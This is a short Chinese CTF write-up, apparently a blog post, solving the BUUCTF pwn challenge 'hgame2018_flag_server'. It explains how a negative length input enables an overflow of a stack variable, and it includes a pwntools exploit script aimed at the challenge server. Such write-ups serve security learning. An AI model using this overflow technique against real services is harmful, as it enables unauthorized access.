[BUUCTF-pwn]——hgame2018_flag_server

[BUUCTF-pwn]——hgame2018_flag_server

保护开启了 NX和canary
看下反汇编,只要v10非0就可以得到flag, 也就是v6 = v8,但是显然v8是一个随机数, 并且没有找到可以修改的地方。

在这里插入图片描述
仔细观察上面的代码,一旦v5为负数,我们就可以无限输入了,并且s1距离v10为0x40 = 64, 我们只需要输入0x40个字符就可以开始修改v10了
在这里插入图片描述在这里插入图片描述

exploit

from pwn import *
p = remote("node3.buuoj.cn",28128)
p.sendlineafter('your username length: ','-1')
payload= 'a' * 0x40 + p32(1)
p.sendlineafter('whats your username?\n',payload)
p.interactive()

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值